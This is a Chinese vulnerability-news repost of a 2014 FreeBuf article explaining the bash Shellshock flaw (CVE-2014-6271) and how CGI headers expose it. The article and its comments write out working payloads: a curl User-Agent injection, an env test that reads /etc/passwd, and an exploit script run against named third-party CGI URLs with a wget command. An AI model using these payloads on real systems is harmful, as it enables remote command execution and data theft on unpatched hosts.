CVE漏洞中文网

0DayBank一个专门收集整理全球互联网漏洞的公开发布网站
  1. 首页
  2. 百科
  3. 正文

bash漏洞

2017年5月21日 1597点热度 0人点赞 0条评论
  • 首页
  • 分类阅读
  • 文库
  • 专栏
  • 公开课
  • 商城
  • 漏洞盒子
注册 | 登录
投稿

BASH漏洞初挖掘

Feynman2014-09-25共166479人围观 ,发现 14 个不明物体漏洞资讯

最近,BASH爆出来一个远程代码执行的漏洞CVE-2014-6271。

BASH除了可以将shell变量导出为环境变量,还可以将shell函数导出为环境变量!当前版本的bash通过以函数名作为环境变量名,以“(){”开头的字串作为环境变量的值来将函数定义导出为环境变量。

此次爆出的漏洞在于BASH处理这样的“函数环境变量”的时候,并没有以函数结尾“}”为结束,而是一直执行其后的shell命令! 

例如

目前,接受HTTP命令的CGI Shell脚本是最主要的被攻击对象。一个常见的HTTP请求是这样:

GET /path?query-param-name=query-param-value HTTP/1.1
Host: www.example.com
Custom: custom-header-value

CGI标准将http请求的所有部分都映射到了环境变量。例如对于Apache的Httpd,字串(){可以出现在以下这些地方:

* Host (“www.example.com”, as REMOTE_HOST)
* Header value (“custom-header-value”, as HTTP_CUSTOM in this example)
* Server protocol (“HTTP/1.1”, as SERVER_PROTOCOL)

通过自定义这些参数的值为“函数环境变量”的形式,就可以远程执行命令!!!例如:

curl -H User-Agent: () { :;}; echo fuck you! 
http://xxxxx/victim.sh

此外,OpenSSH也因其AcceptEnv、TERM、SSH_ORIGINAL_COMMAND等环境变量受此漏洞影响。目前还有更多的受影响程序和利用方式正在不断地被发掘出来!

[参考信息来源http://seclists.org/oss-sec/2014/q3/649,转载请注明来自FreeBuf.COM]

Feynman1 篇文章等级: 1级
|
|
  • 上一篇:黑客版复仇者联盟:美剧《天蝎》/《Scorpion》
  • 下一篇:威胁远胜“心脏出血”?国外新爆Bash高危安全漏洞

这些评论亮了

  • 蓝风(1级)回复
    哇 好厉害的样子
    )7(亮了
发表评论

已有 14 条评论

  • 蓝风 (1级) 2014-09-25回复1楼

    哇 好厉害的样子

    亮了(7)
  • Dr.Shibe (1级) 2014-09-25回复2楼

    :eek: BASH不靠谱啊-。-这么坑的漏洞。。。

    亮了(1)
  • lboy (1级) 2014-09-25回复3楼

    看起来好牛的样子

    亮了(1)
  • evil8 2014-09-25回复4楼

    curl -H User-Agent: ‘() { :;}; echo fuck you!’ http://xxxxx/victim.sh
    这样才对。少了 ‘-----’。

    亮了(2)
  • ziwen (4级)ziwen 终端机 编程 web渗透爱好者 2014-09-25回复5楼

    大概懂了 那么具体攻击目标是什么样的Linux主机呢?

    亮了(1)
  • mugbya 2014-09-25回复6楼

    你也不满sf 哇 :mrgreen:

    亮了(0)
  • blackpower (1级)对个体软件人来说,什么是核心竞争力?不是时间差,不是技术,不... 2014-09-25回复7楼

    只是本地演示和本地样例,一个真实远程的测试机的效果都没呈现出来,证明利用条件还是太苛刻了。
    bt3$env a=’() { :;}; uname -r&whoami&cat /etc/passwd’ bash -c "ls"
    2.6.26-2-amd64
    root
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/亲爱的in:/bin/sh
    bin:x:2:2:bin:/bin:/bin/sh
    sys:x:3:3:sys:/dev:/bin/sh
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/bin/sh
    man:x:6:12:man:/var/cache/man:/bin/sh
    lp:x:7:7:lp:/var/spool/lpd:/bin/sh
    mail:x:8:8:mail:/var/mail:/bin/sh
    ….

    这是本地执行,顶多只能算本地溢出,代码注入经过测试应该还有其他限制条件
    D:\JspStudy\php>php.exe bash.php -u http://www.idealreferences.com/cgi-bin/go.cgi?id=13
    825 -c "wget http://appknox.com -O /tmp/shit"
    D:\JspStudy\php>php.exe bash.php -u http://xxxx.org/cgi-bin/go.sh -c "whoa
    mi"
    D:\JspStudy\php>php.exe bash.php -u xxx.org/cgi-bin/mag_max.cgi -c whoami
    D:\JspStudy\php>

    亮了(5)
  • kyrios 2014-09-25回复8楼

    没啥哟那个,我就没见过使用bash写web服务器的

    亮了(2)
  • 难人_男人 2014-09-25回复9楼

    //

    亮了(0)
  • LI欣欣zn 2014-09-25回复10楼

    Windows又不是没有= =

    亮了(0)
  • Inndust 2014-09-25回复11楼

    Win各種漏洞都習慣了..但linux爆高危漏洞就很少见

    亮了(0)
  • ttzer0 (2级) 2014-09-29回复12楼

    路上的太搞笑了

    亮了(0)
  • 一丁 (1级) 2014-10-19回复13楼

    :mrgreen: 好牛逼的感觉

    亮了(0)
  • 一丁 (1级) 2014-10-19回复14楼

    :mrgreen:

    亮了(0)

必须您当前尚未登录。登陆?注册

必须(保密)

表情插图

取消

Feynman

这家伙太懒,还未填写个人描述!

1 篇文章0 条评论

相关阅读

  • Hola VPN 给出修复方案但问题仍在
  • 安卓版百度浏览器远程代码执行漏洞分析
  • 安全预警:ImageMagick图象处理软件存在远程代码执行(CVE-2016-3714)
  • SpagoBI的远程代码执行漏洞分析(需要认证权限)
  • 三星Android 5设备滥用wifiCredService导致远程代码执行

特别推荐

关注我们 分享每日精选文章

不容错过

  • 中国最大的Webshell后门箱子调查,所有公开大马全军覆没匿名A2016-11-01
  • 隐私泄露:查开房网站的背后金乌实验室2017-03-07
  • 中秋福利:黑客题材美剧《天蝎》第二季回归亲爱的兔子2015-09-22
  • Android APP检测之自动化检测实战:五大APP安全在线检测平台对比DMZLab2016-04-21

FREEBUF

  • 免责声明
  • 关于我们
  • 加入我们

广告及服务

  • 寻求报道
  • 广告合作
  • 联系我们
  • 友情链接

关注我们

  • 官方微信
  • 新浪微博
  • 腾讯微博
  • Twitter

赞助商

Copyright © 2013 WWW.FREEBUF.COM All Rights Reserved 沪ICP备13033796号

css.php

正在加载中...

0day

标签: 暂无
最后更新:2017年5月21日

小助手

这个人很懒,什么都没留下

点赞
< 上一篇
下一篇 >

文章评论

您需要 登录 之后才可以评论

COPYRIGHT © 2024 www.pdr.cn CVE漏洞中文网. ALL RIGHTS RESERVED.

鲁ICP备2022031030号

联系邮箱:wpbgssyubnmsxxxkkk@proton.me